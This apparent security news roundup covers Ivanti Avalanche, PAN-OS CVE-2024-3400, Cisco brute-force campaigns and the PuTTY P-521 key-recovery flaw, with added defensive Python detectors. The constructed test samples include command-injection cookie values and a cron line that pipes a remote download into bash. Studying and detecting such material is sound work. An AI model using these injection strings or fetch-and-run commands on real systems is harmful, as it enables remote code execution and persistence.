Ivanti addressed two critical vulnerabilities in its Avalanche mobile device management (MDM) solution, that can lead to remote command execution.
Ivanti addressed multiple flaws in its Avalanche mobile device management (MDM) solution, including two critical flaws, tracked as CVE-2024-24996 and CVE-2024-29204, that can lead to remote command execution.
The MDM software allows administrators to configure, deploy, update, and maintain up to 100,000 mobile IT assets all in one system.
Below is the description for the two vulnerabilities:
- CVE-2024-24996 (CVSS score 9.8) – A heap overflow vulnerability in the WLInfoRailService component of Ivanti Avalanche before 6.4.3 allows an unauthenticated remote attacker to execute arbitrary commands.
- CVE-2024-29204 (CVSS score 9.8) – A heap overflow vulnerability in the WLAvalancheService component of Ivanti Avalanche before 6.4.3 allows an unauthenticated remote attacker to execute arbitrary commands.
A remote attacker can exploit both issues to execute code without user interaction.
Ivanti also addressed many other medium- and high-severity vulnerabilities that could be exploited to trigger denial-of-service conditions, execute arbitrary commands, carry out remote code execution attacks, or read sensitive information from memory.
The software company was not aware of in-the-wild attacks exploiting any of these vulnerabilities at the time of disclosure.
The company addressed the vulnerabilities with the release of Avalanche 6.4.3.
“To address the security vulnerabilities listed below, it is highly recommended to download the Avalanche installer and update to the latest Avalanche 6.4.3. The installation will apply a fix for each CVE listed in the table below. These vulnerabilities affect any older versions of Avalanche. You can download the latest Avalanche 6.4.3 release here.” reads the advisory.
Follow me on Twitter: @securityaffairs and Facebook and Mastodon
(SecurityAffairs – hacking, Avalanche mobile device management)
Critical Atlassian Flaw Exploited to Deploy Linux Variant of Cerber Ransomware
Hackers Exploit Fortinet Flaw, Deploy ScreenConnect, Metasploit in New Campaign
Cisco Warns of Global Surge in Brute-Force Attacks Targeting VPN and SSH Services
Researchers released exploit code for actively exploited Palo Alto PAN-OS bug
Researchers have released exploit code for the actively exploited vulnerability CVE-2024-3400 in Palo Alto Networks’ PAN-OS.
Researchers at watchTowr Labs have released a technical analysis of the vulnerability CVE-2024-3400 in Palo Alto Networks’ PAN-OS and a proof-of-concept exploit that can be used to execute shell commands on vulnerable firewalls.
CVE-2024-3400 (CVSS score of 10.0) is a critical command injection vulnerability in Palo Alto Networks PAN-OS software. An unauthenticated attacker can exploit the flaw to execute arbitrary code with root privileges on affected firewalls. This flaw impacts PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls configured with GlobalProtect gateway or GlobalProtect portal (or both) and device telemetry enabled.
Palo Alto Networks and Unit 42 are investigating activity related to the CVE-2024-3400 PAN-OS flaw and discovered that threat actors have been exploiting it since March 26, 2024.
The researchers are tracking this cluster of activity, conducted by an unknown threat actor, under the name Operation MidnightEclipse.
“Palo Alto Networks is aware of malicious exploitation of this issue. We are tracking the initial exploitation of this vulnerability under the name Operation MidnightEclipse, as we assess with high confidence that known exploitation we’ve analyzed thus far is limited to a single threat actor.” reads the report. “We also assess that additional threat actors may attempt exploitation in the future.”
Upon exploiting the flaw, the threat actor was observed creating a cron job that ran every minute, fetching commands hosted on an external server and executing them via bash.
The researchers were unable to retrieve the commands executed by the attackers; however, they believe the threat actors attempted to deploy a second, Python-based backdoor on the vulnerable devices.
Researchers at cybersecurity firm Volexity refer to this second Python backdoor as UPSTYLE.
The threat actor, tracked by Volexity as UTA0218, remotely exploited the firewall device to establish a reverse shell and install additional tools. Their primary objective was to extract configuration data from the devices and then use it as a foothold to expand laterally within the targeted organizations.
watchTowr Labs has now released a detection artifact generator, essentially a single HTTP request that exercises the vulnerable code path.
“As we can see, we inject our command injection payload into the SESSID cookie value – which, when a Palo Alto GlobalProtect appliance has telemetry enabled – is then concatenated into a string and ultimately executed as a shell command.” reads the analysis published by watchTowr Labs.
“Something-something-sophistication-levels-only-achievable-by-a-nation-state-something-something.”
Justin Elze, CTO at TrustedSec, also published the exploit used in attacks in the wild.
This week, US CISA added the vulnerability CVE-2024-3400 to its Known Exploited Vulnerabilities (KEV) catalog, ordering U.S. federal agencies to address it by April 19th.
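Two checks follow directly from the description above: the injected value arrives in the SESSID cookie, and post-exploitation persistence took the form of a cron job that fetched and ran remote commands every minute. The Python below is an added example, not code from watchTowr, Unit 42 or Volexity. The character set assumed for a legitimate session token is an assumption, all cookie headers and crontab lines are constructed samples, and the exact payload path used in the wild is deliberately not reproduced; only its shape (traversal plus command substitution) is.

```python
import re

# Assumption: a legitimate session id is an opaque token drawn from this set;
# anything else in SESSID is worth inspecting.
SESSID_OK = re.compile(r"^[A-Za-z0-9_\-]{1,128}$")
SHELL_META = re.compile(r"[`$;|&<>]")
# "fetch something remote and run it" in a cron command line
FETCH_AND_RUN = re.compile(
    r"\b(?:curl|wget)\b.*\|\s*(?:ba|da)?sh\b"      # curl ... | bash
    r"|\b(?:ba)?sh\s+-c\s+.*\b(?:curl|wget)\b"     # bash -c "$(curl ...)"
)


def parse_cookie_header(header: str) -> dict:
    """Minimal Cookie header parser; a ';' inside a value ends it, as in RFC 6265."""
    cookies = {}
    for part in header.split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            cookies[name] = value
    return cookies


def sessid_findings(cookie_header: str) -> list:
    """Reasons the SESSID value looks like an injection attempt; [] if benign or absent."""
    sessid = parse_cookie_header(cookie_header).get("SESSID")
    if sessid is None or SESSID_OK.match(sessid):
        return []
    reasons = []
    if "../" in sessid:
        reasons.append("path traversal")
    if SHELL_META.search(sessid):
        reasons.append("shell metacharacters")
    return reasons or ["unexpected characters"]


def cron_findings(crontab_text: str) -> list:
    """Crontab entries that download and execute remote content (the persistence shape described above)."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)           # five schedule fields, then the command
        if len(fields) < 6:
            continue
        schedule, command = " ".join(fields[:5]), fields[5]
        if FETCH_AND_RUN.search(command):
            hits.append({"schedule": schedule,
                         "every_minute": schedule == "* * * * *",
                         "command": command})
    return hits


# Constructed samples, not captured traffic.
SAMPLE_COOKIES = [
    "SESSID=7f3a9c1e2b4d5a6f; lang=en",      # benign opaque token
    "SESSID=/../../../tmp/`id`",              # traversal plus command substitution
    "PHPSESSID=abc123; theme=dark",           # no SESSID at all
    "SESSID=abc$(whoami)",                    # substitution without traversal
]
SAMPLE_CRONTAB = """\
# constructed crontab
0 2 * * * /usr/local/bin/backup.sh
*/5 * * * * curl -s https://monitor.example/ping
* * * * * curl -s http://203.0.113.10/c | bash
"""

if __name__ == "__main__":
    for header in SAMPLE_COOKIES:
        print(header, "->", sessid_findings(header) or "ok")
    for hit in cron_findings(SAMPLE_CRONTAB):
        print("cron:", hit)
```

The cookie check is meant to run on reverse-proxy or packet-capture logs in front of the GlobalProtect portal; the crontab check is a host-side triage step for a firewall you already suspect was touched, and it flags the fetch-and-execute pattern on any schedule, recording separately whether it was the every-minute schedule the report describes.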
Cisco warns of large-scale brute-force attacks against VPN and SSH services
Cisco Talos warns of large-scale brute-force attacks against a variety of targets, including VPN services, web application authentication interfaces and SSH services.
Cisco Talos researchers warn of large-scale credential brute-force attacks that have been targeting a variety of services, including Virtual Private Network (VPN) services, web application authentication interfaces and SSH services, since at least March 18, 2024.
Below is a list of known affected services:
- Cisco Secure Firewall VPN
- Checkpoint VPN
- Fortinet VPN
- SonicWall VPN
- RD Web Services
- MikroTik
- DrayTek
- Ubiquiti
Successful brute-force attacks can result in unauthorized network access, account lockouts, or denial-of-service (DoS) conditions.
These attacks originate from Tor exit nodes and from anonymizing tunnels and proxies, such as:
- VPN Gate
- IPIDEA Proxy
- BigMama Proxy
- Space Proxies
- Nexus Proxy
- Proxy Rack
“The brute-forcing attempts use generic usernames and valid usernames for specific organizations. The targeting of these attacks appears to be indiscriminate and not directed at a particular region or industry.” reads the advisory published by Cisco Talos.
The malicious activity lacks a specific focus on particular industries or regions, suggesting a broader strategy of random, opportunistic attacks.
The advisory published by Talos includes a list of indicators of compromise (IoCs) for this campaign.
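The advisory describes the behaviour (many failures per source, generic and organization-specific usernames, indiscriminate targeting) but not how to spot it in your own logs. The following is an added Python example, not Talos tooling, that runs the matching detection over sshd authentication lines: a sliding window of failures per source address, a password-spraying variant keyed on distinct usernames, and a "success after a burst of failures" alert, which is the one that matters most. The log lines are constructed, and the thresholds (5 failures in 60 seconds, 3 distinct usernames) are assumptions to tune for your environment.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sshd auth log lines (syslog format); not from the Talos advisory.
SAMPLE_AUTH_LOG = """\
Mar 19 10:00:01 bastion sshd[2101]: Failed password for invalid user admin from 198.51.100.7 port 41002 ssh2
Mar 19 10:00:02 bastion sshd[2103]: Failed password for invalid user test from 198.51.100.7 port 41003 ssh2
Mar 19 10:00:03 bastion sshd[2105]: Failed password for root from 198.51.100.7 port 41004 ssh2
Mar 19 10:00:04 bastion sshd[2107]: Failed password for invalid user oracle from 198.51.100.7 port 41005 ssh2
Mar 19 10:00:05 bastion sshd[2109]: Failed password for invalid user guest from 198.51.100.7 port 41006 ssh2
Mar 19 10:00:06 bastion sshd[2111]: Failed password for invalid user ubuntu from 198.51.100.7 port 41007 ssh2
Mar 19 10:01:10 bastion sshd[2201]: Failed password for svc_backup from 203.0.113.9 port 50010 ssh2
Mar 19 10:01:11 bastion sshd[2203]: Failed password for svc_backup from 203.0.113.9 port 50011 ssh2
Mar 19 10:01:12 bastion sshd[2205]: Failed password for svc_backup from 203.0.113.9 port 50012 ssh2
Mar 19 10:01:13 bastion sshd[2207]: Failed password for svc_backup from 203.0.113.9 port 50013 ssh2
Mar 19 10:01:14 bastion sshd[2209]: Failed password for svc_backup from 203.0.113.9 port 50014 ssh2
Mar 19 10:01:20 bastion sshd[2211]: Accepted password for svc_backup from 203.0.113.9 port 50015 ssh2
Mar 19 10:02:00 bastion sshd[2301]: Failed password for alice from 192.0.2.5 port 60001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<outcome>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def parse_events(lines, year=2024):
    """(timestamp, failed?, user, source ip) for each sshd password-auth line; syslog carries no year, so one is assumed."""
    events = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["outcome"] == "Failed", m["user"], m["ip"]))
    return events


def detect(events, window_s=60, fail_threshold=5, spray_users=3):
    """One alert per (source, kind): bruteforce, password_spray, success_after_failures."""
    recent = defaultdict(deque)   # ip -> (ts, user) of failures still inside the window
    fired = set()
    alerts = []

    def alert(ip, kind, ts, detail):
        if (ip, kind) not in fired:
            fired.add((ip, kind))
            alerts.append({"ip": ip, "kind": kind, "at": ts, "detail": detail})

    for ts, failed, user, ip in sorted(events):
        q = recent[ip]
        while q and (ts - q[0][0]).total_seconds() > window_s:
            q.popleft()
        if failed:
            q.append((ts, user))
            if len(q) >= fail_threshold:
                alert(ip, "bruteforce", ts, f"{len(q)} failures within {window_s}s")
                users = {u for _, u in q}
                if len(users) >= spray_users:
                    alert(ip, "password_spray", ts, f"{len(users)} distinct usernames: {sorted(users)}")
        elif len(q) >= fail_threshold:
            alert(ip, "success_after_failures", ts, f"login as {user} after {len(q)} recent failures")
    return alerts


if __name__ == "__main__":
    for a in detect(parse_events(SAMPLE_AUTH_LOG.splitlines())):
        print(a["at"], a["ip"], a["kind"], "-", a["detail"])
```

The same structure applies to VPN and web-portal logs; only LINE_RE changes. Correlating the flagged sources against the proxy and Tor exit lists in the advisory's IoCs turns the medium-confidence volume alerts into high-confidence ones.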
PuTTY SSH client flaw allows private key recovery
The PuTTY Secure Shell (SSH) and Telnet client is affected by a critical vulnerability that could be exploited to recover private keys.
PuTTY releases from 0.68 to 0.80 inclusive are affected by a critical vulnerability, tracked as CVE-2024-31497, that resides in the code that generates signatures from ECDSA private keys which use the NIST P-521 curve.
An attacker can exploit the vulnerability to recover NIST P-521 private keys.
“The effect of the vulnerability is to compromise the private key. An attacker in possession of a few dozen signed messages and the public key has enough information to recover the private key, and then forge signatures as if they were from you, allowing them to (for instance) log in to any servers you use that key for.” reads the advisory. “To obtain these signatures, an attacker need only briefly compromise any server you use the key to authenticate to, or momentarily gain access to a copy of Pageant holding the key. (However, these signatures are not exposed to passive eavesdroppers of SSH connections.)”
The vulnerability was discovered by researchers Fabian Bäumer and Marcus Brinkmann from the Ruhr University Bochum. Bäumer explained that the vulnerability stems from the generation of biased ECDSA cryptographic nonces, which could allow full secret key recovery.
“The PuTTY client and all related components generate heavily biased ECDSA nonces in the case of NIST P-521. To be more precise, the first 9 bits of each ECDSA nonce are zero. This allows for full secret key recovery in roughly 60 signatures by using state-of-the-art techniques. These signatures can either be harvested by a malicious server (man-in-the-middle attacks are not possible given that clients do not transmit their signature in the clear) or from any other source, e.g. signed git commits through forwarded agents.” Bäumer explained. “The nonce generation for other curves is slightly biased as well. However, the bias is negligible and far from enough to perform lattice-based key recovery attacks (not considering cryptanalytical advancements).”
The following products bundle an affected PuTTY version and are therefore also impacted by the flaw:
- FileZilla (3.24.1 – 3.66.5)
- WinSCP (5.9.5 – 6.3.2)
- TortoiseGit (2.4.0.2 – 2.15.0)
- TortoiseSVN (1.10.0 – 1.14.6)
The flaw has been fixed in PuTTY 0.81, FileZilla 3.67.0, WinSCP 6.3.3, and TortoiseGit 2.15.0.1. TortoiseSVN users are recommended to configure TortoiseSVN to use Plink from the latest PuTTY 0.81 release when accessing a SVN repository via SSH until a patch becomes available.
Any ECDSA NIST P-521 key that has been used with a PuTTY component affected by CVE-2024-31497 should be considered compromised. Such keys should be revoked by removing them from authorized_keys files, GitHub accounts, and any other platform where they are trusted, and replaced with freshly generated keys.
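Why exactly 9 bits, and why only P-521? The order of P-521 is a 521-bit prime, and a deterministic nonce built from a single 512-bit SHA-512 output reduced modulo that order can never reach the top 9 bits; for P-256 the same construction is reduced modulo a 256-bit order and the result is essentially uniform. The Python below is an added illustration, not PuTTY's code: the group orders are replaced by stand-in moduli of the right bit length (an assumption; only the bit length matters for the effect shown), and the "fixed" generator is a simplified expand-then-reduce scheme in the spirit of RFC 6979 rather than the RFC's HMAC_DRBG. It also includes the inventory step the paragraph above calls for, a scan of constructed authorized_keys content for ecdsa-sha2-nistp521 entries.

```python
import hashlib
import hmac

# Stand-in group orders. The real P-521 and P-256 orders are 521-bit and 256-bit
# primes; only the bit length matters for the bias shown here, so these
# placeholders are used instead of the curve constants (an assumption).
STANDIN_ORDER = {521: (1 << 521) - 1, 256: (1 << 256) - 189}


def single_hash_nonce(priv: int, msg: bytes, order_bits: int) -> int:
    """The flawed shape: one 512-bit SHA-512 output reduced modulo the order.
    With a 521-bit order the hash is already smaller than the modulus, so the
    reduction changes nothing and the top 9 bits of every nonce are zero."""
    n = STANDIN_ORDER[order_bits]
    digest = hashlib.sha512(priv.to_bytes(66, "big") + msg).digest()
    return int.from_bytes(digest, "big") % n


def expanded_nonce(priv: int, msg: bytes, order_bits: int) -> int:
    """The fixed shape (simplified, in the spirit of RFC 6979): expand keyed output
    to order_bits + 64 bits before reducing, leaving a ~2^-64 bias instead of 9 known bits."""
    n = STANDIN_ORDER[order_bits]
    key = priv.to_bytes(66, "big")
    stream, counter = b"", 0
    while len(stream) * 8 < order_bits + 64:
        stream += hmac.new(key, msg + counter.to_bytes(4, "big"), hashlib.sha512).digest()
        counter += 1
    return int.from_bytes(stream, "big") % n


def leading_zero_bits(k: int, order_bits: int) -> int:
    return order_bits - k.bit_length()


def min_leading_zero_bits(nonce_fn, order_bits: int, samples: int = 200, priv: int = 0x1234567) -> int:
    """Smallest number of leading zero bits seen across `samples` deterministic nonces."""
    return min(leading_zero_bits(nonce_fn(priv, b"message %d" % i, order_bits), order_bits)
               for i in range(samples))


# Constructed authorized_keys content (the key blobs are placeholders, not real keys).
SAMPLE_AUTHORIZED_KEYS = """\
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDER carol@desk
no-pty,from="10.0.0.0/8" ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBPLACEHOLDER bob@ci
ecdsa-sha2-nistp521 AAAAE2VjZHNhLXNoYTItbmlzdHA1MjEAAAAIbmlzdHA1MjEAAACFPLACEHOLDER alice@laptop
"""


def p521_key_comments(authorized_keys_text: str) -> list:
    """Comments of ecdsa-sha2-nistp521 entries: the keys to revoke if they were ever used from PuTTY 0.68-0.80."""
    hits = []
    for line in authorized_keys_text.splitlines():
        fields = line.split()
        if not fields or fields[0].startswith("#"):
            continue
        for i, field in enumerate(fields):      # options (without embedded spaces) may precede the key type
            if field.startswith(("ssh-", "ecdsa-", "sk-")):
                if field == "ecdsa-sha2-nistp521":
                    hits.append(" ".join(fields[i + 2:]) or "(no comment)")
                break
    return hits


if __name__ == "__main__":
    print("P-521, single hash, min leading zero bits:", min_leading_zero_bits(single_hash_nonce, 521))
    print("P-521, expanded,    min leading zero bits:", min_leading_zero_bits(expanded_nonce, 521))
    print("P-256, single hash, min leading zero bits:", min_leading_zero_bits(single_hash_nonce, 256))
    print("P-521 keys to revoke:", p521_key_comments(SAMPLE_AUTHORIZED_KEYS))
```

The 9 known bits per signature are what make the lattice (hidden number problem) attack work from a few dozen signatures; the expanded generator removes them, which is the substance of the 0.81 fix. The authorized_keys scan is deliberately simple (it does not handle option strings containing spaces) and should be run against every server, Git hosting account and agent the affected keys were ever used with.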